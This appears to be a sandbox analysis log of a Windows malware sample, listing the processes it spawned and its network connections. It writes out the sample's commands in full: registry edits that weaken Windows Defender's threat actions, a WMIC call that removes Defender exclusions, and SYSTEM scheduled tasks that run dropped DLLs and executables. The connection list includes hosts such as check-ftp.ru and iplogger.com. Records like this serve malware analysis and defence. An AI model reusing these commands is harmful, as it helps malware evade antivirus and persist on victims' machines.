forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLaBYusGTeVzUnMcXL"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YFvDcakXU\OvHmhT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fbGnOvfweZKrsys" /V1 /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PhaZdSAoTEvbQMDnk" /SC once /ST 15:02:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe\" j3 /TwpPdidzV 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "PhaZdSAoTEvbQMDnk"

C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe

C:\Windows\Temp\czMOsRWjwZXFHErP\GbWughsnJDwDpGB\eudyWVr.exe j3 /TwpPdidzV 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4404 -ip 4404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 1376

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "fbGnOvfweZKrsys2" /F /xml "C:\Program Files (x86)\YFvDcakXU\xkVzZHx.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "fbGnOvfweZKrsys"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "fbGnOvfweZKrsys"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yNOCAlXWvqlNJH" /F /xml "C:\Program Files (x86)\EhcFZyxgIKdU2\YSesdbb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MsQSFPRxJyXkk2" /F /xml "C:\ProgramData\CPUWfhACwAFVvAVB\HbYEILi.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MROCFmTWQtlYeIrnq2" /F /xml "C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\TUmeTrq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PPSJBYzNMLKWIdMVnTn2" /F /xml "C:\Program Files (x86)\zkyeWAejRmGXC\YHKmCEg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "skrppRkWbRTRJUWvY" /SC once /ST 06:23:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\czMOsRWjwZXFHErP\GteFtAcY\suffBuq.dll\",#1 /iUdidPs 385118" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "skrppRkWbRTRJUWvY"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\czMOsRWjwZXFHErP\GteFtAcY\suffBuq.dll",#1 /iUdidPs 385118

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\czMOsRWjwZXFHErP\GteFtAcY\suffBuq.dll",#1 /iUdidPs 385118

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "PhaZdSAoTEvbQMDnk"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4800 -ip 4800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2188 -ip 2188

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "skrppRkWbRTRJUWvY"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2332

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLaBYusGTeVzUnMcXL"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YFvDcakXU\JVNkkE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fbGnOvfweZKrsys" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "fbGnOvfweZKrsys2" /F /xml "C:\Program Files (x86)\YFvDcakXU\uEHhdRF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "fbGnOvfweZKrsys"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "fbGnOvfweZKrsys"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yNOCAlXWvqlNJH" /F /xml "C:\Program Files (x86)\EhcFZyxgIKdU2\YgfiGYo.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MsQSFPRxJyXkk2" /F /xml "C:\ProgramData\CPUWfhACwAFVvAVB\xEHfVoL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MROCFmTWQtlYeIrnq2" /F /xml "C:\Program Files (x86)\uBqHJZyJRZafGAkLOrR\XDRsbIj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PPSJBYzNMLKWIdMVnTn2" /F /xml "C:\Program Files (x86)\zkyeWAejRmGXC\hAGVAhg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "PhaZdSAoTEvbQMDnk"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4948 -ip 4948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 2116

C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3352 -ip 3352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4980 -ip 4980

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 864

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.169.89:443 yip.su tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 102.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 prolinetrailers.com.au udp
US 8.8.8.8:53 tad-maid.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 160.153.0.192:443 prolinetrailers.com.au tcp
GB 89.187.86.136:443 tad-maid.com tcp
US 8.8.8.8:53 192.0.153.160.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 136.86.187.89.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
RU 5.42.99.177:80 5.42.99.177 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 177.99.42.5.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 dnschnj.at udp
US 8.8.8.8:53 techolivls.in udp
US 8.8.8.8:53 check-ftp.ru udp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
MX 189.181.34.217:80 check-ftp.ru tcp
MX 189.181.34.217:80 check-ftp.ru tcp
N/A 127.0.0.127:80 tcp
MX 189.181.34.217:80 check-ftp.ru tcp
N/A 127.0.0.127:80 tcp
US 8.8.8.8:53 217.34.181.189.in-addr.arpa udp
N/A 127.0.0.127:80 tcp
N/A 127.0.0.127:80 tcp
N/A 127.0.0.127:80 tcp
US 8.8.8.8:53 techolivls.in udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 34.217.172.173:80 api4.check-data.xyz tcp
US 8.8.8.8:53 173.172.217.34.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
